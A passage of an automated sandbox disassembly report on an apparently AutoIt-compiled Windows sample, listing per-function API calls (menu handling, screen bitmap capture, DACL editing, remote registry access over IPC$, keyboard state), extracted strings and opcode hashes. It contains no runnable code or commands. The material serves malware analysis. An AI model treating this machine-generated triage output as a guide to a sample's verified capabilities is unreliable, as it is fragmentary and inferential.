                                                                  • Opcode ID: bf9dc7e10b339071967f89e3abca4422a683beb86a8322b555c23d9ae8b9f662
                                                                  • Instruction ID: 60244f3eb9caa6f21591de031891bf8632b4d7c9cb0d4145382b8dc65963b700
                                                                  • Opcode Fuzzy Hash: bf9dc7e10b339071967f89e3abca4422a683beb86a8322b555c23d9ae8b9f662
                                                                  • Instruction Fuzzy Hash: 09414975601204FFDB129F69EC88EAA7BBCEF89B15F108459F906D7260CB31AD41DB60
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 003A076F
                                                                  • _wcscat.LIBCMT ref: 003A0787
                                                                  • _wcscat.LIBCMT ref: 003A0799
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A07AE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A07C2
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 003A07DA
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 003A07F4
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A0806
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                  • String ID: *.*
                                                                  • API String ID: 34673085-438819550
                                                                  • Opcode ID: a685b5df8f792f7c4228ce2e43ef2cbf4cd6fd6603126be1e7d7bd7f44f775d3
                                                                  • Instruction ID: 2583d496f6d06d1d31fd5d91266311f4b3a701abc08df2cf83fec5f780d33469
                                                                  • Opcode Fuzzy Hash: a685b5df8f792f7c4228ce2e43ef2cbf4cd6fd6603126be1e7d7bd7f44f775d3
                                                                  • Instruction Fuzzy Hash: 7A8183715043019FCB2ADF64C84596EB7E8FBCA304F158C2EF889DB261E734E9548B92
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003BEF3B
                                                                  • GetFocus.USER32 ref: 003BEF4B
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 003BEF56
                                                                  • _memset.LIBCMT ref: 003BF081
                                                                  • GetMenuItemInfoW.USER32 ref: 003BF0AC
                                                                  • GetMenuItemCount.USER32(00000000), ref: 003BF0CC
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 003BF0DF
                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 003BF113
                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 003BF15B
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003BF193
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003BF1C8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1296962147-4108050209
                                                                  • Opcode ID: 1e8425997a27c3c04102928f557ff863a89ec3f394372d98d3bb3df233717e84
                                                                  • Instruction ID: c509f594fdaca10a200bcf26f8296f8f78958b2a163b7715a79e7ef05bb829c8
                                                                  • Opcode Fuzzy Hash: 1e8425997a27c3c04102928f557ff863a89ec3f394372d98d3bb3df233717e84
                                                                  • Instruction Fuzzy Hash: 7D819D70505301AFD722DF18DC84AEBBBE9FB88318F01492EFA95976A1D730D905CB92
                                                                  APIs
                                                                    • Part of subcall function 0038ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0038ABD7
                                                                    • Part of subcall function 0038ABBB: GetLastError.KERNEL32(?,0038A69F,?,?,?), ref: 0038ABE1
                                                                    • Part of subcall function 0038ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0038A69F,?,?,?), ref: 0038ABF0
                                                                    • Part of subcall function 0038ABBB: HeapAlloc.KERNEL32(00000000,?,0038A69F,?,?,?), ref: 0038ABF7
                                                                    • Part of subcall function 0038ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0038AC0E
                                                                    • Part of subcall function 0038AC56: GetProcessHeap.KERNEL32(00000008,0038A6B5,00000000,00000000,?,0038A6B5,?), ref: 0038AC62
                                                                    • Part of subcall function 0038AC56: HeapAlloc.KERNEL32(00000000,?,0038A6B5,?), ref: 0038AC69
                                                                    • Part of subcall function 0038AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0038A6B5,?), ref: 0038AC7A
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0038A8CB
                                                                  • _memset.LIBCMT ref: 0038A8E0
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0038A8FF
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0038A910
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0038A94D
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0038A969
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0038A986
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0038A995
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0038A99C
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0038A9BD
                                                                  • CopySid.ADVAPI32(00000000), ref: 0038A9C4
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0038A9F5
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0038AA1B
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0038AA2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: 986279ad786489bf2fc1fd7228a02cbd773c1c0a8950386c6cdd93b2471364a2
                                                                  • Instruction ID: 413a440bf43fe700976503a1253c02b77d34d92589bb14c4baaab02d2c5aff9d
                                                                  • Opcode Fuzzy Hash: 986279ad786489bf2fc1fd7228a02cbd773c1c0a8950386c6cdd93b2471364a2
                                                                  • Instruction Fuzzy Hash: 01516071900609AFEF16EFA0DD45EEEBB79FF44300F04815AF915AB290D7349A05CB61
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 003A9E36
                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003A9E42
                                                                  • CreateCompatibleDC.GDI32(?), ref: 003A9E4E
                                                                  • SelectObject.GDI32(00000000,?), ref: 003A9E5B
                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003A9EAF
                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 003A9EEB
                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003A9F0F
                                                                  • SelectObject.GDI32(00000006,?), ref: 003A9F17
                                                                  • DeleteObject.GDI32(?), ref: 003A9F20
                                                                  • DeleteDC.GDI32(00000006), ref: 003A9F27
                                                                  • ReleaseDC.USER32(00000000,?), ref: 003A9F32
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
                                                                  • Opcode ID: d4558e21d2cffc9bb2d3d1690bbe5d1ab7a915c590e834d76b407ec1275ab74a
                                                                  • Instruction ID: 362156d4d74aeba42bc9ba460ca684d44fbc3bcf329670001e06c37136f48847
                                                                  • Opcode Fuzzy Hash: d4558e21d2cffc9bb2d3d1690bbe5d1ab7a915c590e834d76b407ec1275ab74a
                                                                  • Instruction Fuzzy Hash: 51514C75900309EFCB16CFA8DC85EAEBBB9EF49310F14841EF959A7250C731A941CB90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2889450990-2391861430
                                                                  • Opcode ID: 0b307c858d36d81d00cf92ba13066a0b8704735aa715ac20ba5b9591ef99f0f6
                                                                  • Instruction ID: 3e75df8957fff0eac8cb897109700d94c93853cc89e1b9b2a07602229e261a46
                                                                  • Opcode Fuzzy Hash: 0b307c858d36d81d00cf92ba13066a0b8704735aa715ac20ba5b9591ef99f0f6
                                                                  • Instruction Fuzzy Hash: 4E518272800609BACF16EBE0CD42EEEBB78AF08345F104165F905760A2EB756F59DF60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2889450990-3420473620
                                                                  • Opcode ID: c5a17e2cc42e7c3bd8bb8f33ca7118fd76f644b3d511961a7985b3418fa29f03
                                                                  • Instruction ID: 3cdcba370d7cc9cd1963f02040ef33172168ce0b8bbce7134aad742cc1832adf
                                                                  • Opcode Fuzzy Hash: c5a17e2cc42e7c3bd8bb8f33ca7118fd76f644b3d511961a7985b3418fa29f03
                                                                  • Instruction Fuzzy Hash: 91519372900649BACF16EBE0CD42EEEBB78AF08345F104065F905760A2EB746F59DF61
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: $E@$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 3964851224-2020488321
                                                                  • Opcode ID: c0c7cea081f1878e71998f1ff7088ab97a95bdb2f4483f1c2197a75cbde18163
                                                                  • Instruction ID: 48d0717e7f83600f631554d13a77ff9ca2d11d82ef2581b35be2551f40bc0a0d
                                                                  • Opcode Fuzzy Hash: c0c7cea081f1878e71998f1ff7088ab97a95bdb2f4483f1c2197a75cbde18163
                                                                  • Instruction Fuzzy Hash: 9341927411025A9FCF02EF10DC51AEB3365AF52344F118829EE552FAA6EB74AE0ACB14
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003955D7
                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00395664
                                                                  • GetMenuItemCount.USER32(00411708), ref: 003956ED
                                                                  • DeleteMenu.USER32(00411708,00000005,00000000,000000F5,?,?), ref: 0039577D
                                                                  • DeleteMenu.USER32(00411708,00000004,00000000), ref: 00395785
                                                                  • DeleteMenu.USER32(00411708,00000006,00000000), ref: 0039578D
                                                                  • DeleteMenu.USER32(00411708,00000003,00000000), ref: 00395795
                                                                  • GetMenuItemCount.USER32(00411708), ref: 0039579D
                                                                  • SetMenuItemInfoW.USER32(00411708,00000004,00000000,00000030), ref: 003957D3
                                                                  • GetCursorPos.USER32(?), ref: 003957DD
                                                                  • SetForegroundWindow.USER32(00000000), ref: 003957E6
                                                                  • TrackPopupMenuEx.USER32(00411708,00000000,?,00000000,00000000,00000000), ref: 003957F9
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00395805
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 3993528054-0
                                                                  • Opcode ID: fb7ede15187135c26cff208ecc5205824d7259993a9482ce3b6028acf8862f65
                                                                  • Instruction ID: 350e923ec252a991525403aee5cffc9b142ffc3757911fff5535eb12c01a9380
                                                                  • Opcode Fuzzy Hash: fb7ede15187135c26cff208ecc5205824d7259993a9482ce3b6028acf8862f65
                                                                  • Instruction Fuzzy Hash: F0710331645A05BEEF239F54DC49FAABF69FF00368F244206F6186A1E0C7716C90DB90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0038A1DC
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0038A211
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0038A22D
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0038A249
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0038A273
                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0038A29B
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0038A2A6
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0038A2AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 1687751970-22481851
                                                                  • Opcode ID: 6c59f9159e8e1b5be69266ad732d13c3f42947a390c13aabc1b5ec3904a35ab7
                                                                  • Instruction ID: fcb1f60d8aff9ef6735ec11911b6df1ed6a7f03307843d76bb14943991eecac2
                                                                  • Opcode Fuzzy Hash: 6c59f9159e8e1b5be69266ad732d13c3f42947a390c13aabc1b5ec3904a35ab7
                                                                  • Instruction Fuzzy Hash: D541FA76C10629ABDF22EBA4DC95DEDB778BF04700F00456AF801B71A1EB74AE09CB50
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 003967FD
                                                                  • __swprintf.LIBCMT ref: 0039680A
                                                                    • Part of subcall function 0037172B: __woutput_l.LIBCMT ref: 00371784
                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00396834
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00396840
                                                                  • LockResource.KERNEL32(00000000), ref: 0039684D
                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 0039686D
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0039687F
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0039688E
                                                                  • LockResource.KERNEL32(?), ref: 0039689A
                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003968F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                  • String ID: 5@
                                                                  • API String ID: 1433390588-819730362
                                                                  • Opcode ID: 657859463bd80732a986593e4c668d2dbf093ff4c9367690634203551365c707
                                                                  • Instruction ID: 7bfd0e2d58b6ff1b31db809e10ada61f2adadc2a1cfab7a29668fb9e8633500e
                                                                  • Opcode Fuzzy Hash: 657859463bd80732a986593e4c668d2dbf093ff4c9367690634203551365c707
                                                                  • Instruction Fuzzy Hash: 0131707190621AABDF129F60ED56ABF7BACEF08341F008826F906E6150E734DA11DB60
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003C36F4,00000010,?,Bad directive syntax error,003EDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003925D6
                                                                  • LoadStringW.USER32(00000000,?,003C36F4,00000010), ref: 003925DD
                                                                  • _wprintf.LIBCMT ref: 00392610
                                                                  • __swprintf.LIBCMT ref: 00392632
                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003926A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 1080873982-4153970271
                                                                  • Opcode ID: f09a81682d26ab1166c20196ba316cf163ccb133a20f400e8210c59b2c40eb25
                                                                  • Instruction ID: a245ea2d5a1a37206df587a7a0e266f9d398b927b32a823272b9adf56866c4cc
                                                                  • Opcode Fuzzy Hash: f09a81682d26ab1166c20196ba316cf163ccb133a20f400e8210c59b2c40eb25
                                                                  • Instruction Fuzzy Hash: F2216231810219BFCF13BF90CC46FEE7B39BF18305F004466F5056A0A2DA75A618DB50
                                                                  APIs
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00397B42
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00397B58
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00397B69
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00397B7B
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00397B8C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: SendString
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 890592661-1007645807
                                                                  • Opcode ID: 82a22cd3a57def5ddbb9ab7004aaf28c5ff2ff14c850e96e2d93d2dd51336f82
                                                                  • Instruction ID: 76435d436e4e03e88957f03593aa7e753f5761c7abb06f12a4dd8fcd99b355bf
                                                                  • Opcode Fuzzy Hash: 82a22cd3a57def5ddbb9ab7004aaf28c5ff2ff14c850e96e2d93d2dd51336f82
                                                                  • Instruction Fuzzy Hash: 891194A1A602597DDB21BB61CC4AEFFBE7CEBD1B11F10042A7811B70D1DA741A49C5B1
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 00397794
                                                                    • Part of subcall function 0036DC38: timeGetTime.WINMM(?,75A4B400,003C58AB), ref: 0036DC3C
                                                                  • Sleep.KERNEL32(0000000A), ref: 003977C0
                                                                  • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003977E4
                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00397806
                                                                  • SetActiveWindow.USER32 ref: 00397825
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00397833
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00397852
                                                                  • Sleep.KERNEL32(000000FA), ref: 0039785D
                                                                  • IsWindow.USER32 ref: 00397869
                                                                  • EndDialog.USER32(00000000), ref: 0039787A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1194449130-3405671355
                                                                  • Opcode ID: a75097d0e9e72b155c4eaa75b893e018a35efc916b4ea2f3ca0c1aff9670bfaa
                                                                  • Instruction ID: 75714c1ae40495bea10f5f5847b337ada35e9f4c6c3d4225834c176d72bf38a3
                                                                  • Opcode Fuzzy Hash: a75097d0e9e72b155c4eaa75b893e018a35efc916b4ea2f3ca0c1aff9670bfaa
                                                                  • Instruction Fuzzy Hash: B2218470259209AFEB035F60FC8DBB67F2DFB04346F004025F916861A1CB718C01CB68
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • CoInitialize.OLE32(00000000), ref: 003A034B
                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003A03DE
                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 003A03F2
                                                                  • CoCreateInstance.OLE32(003DDA8C,00000000,00000001,00403CF8,?), ref: 003A043E
                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003A04AD
                                                                  • CoTaskMemFree.OLE32(?,?), ref: 003A0505
                                                                  • _memset.LIBCMT ref: 003A0542
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 003A057E
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003A05A1
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 003A05A8
                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003A05DF
                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 003A05E1
                                                                  Similarity
                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                  • String ID:
                                                                  • API String ID: 1246142700-0
                                                                  • Opcode ID: af8525ec4b6c8b37942c50ce19189e497b70857d5bc6d422dd2fbff69ebc0466
                                                                  • Instruction ID: 9c3e4bc558deadd4bb6bc73f3dc792500552bc52c364d3f528d52369219c4b12
                                                                  • Opcode Fuzzy Hash: af8525ec4b6c8b37942c50ce19189e497b70857d5bc6d422dd2fbff69ebc0466
                                                                  • Instruction Fuzzy Hash: 9BB1D875A00209AFDB15DFA4C888DAEBBB9FF49305F158499E806EB261DB30ED45CF50
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00392ED6
                                                                  • SetKeyboardState.USER32(?), ref: 00392F41
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00392F61
                                                                  • GetKeyState.USER32(000000A0), ref: 00392F78
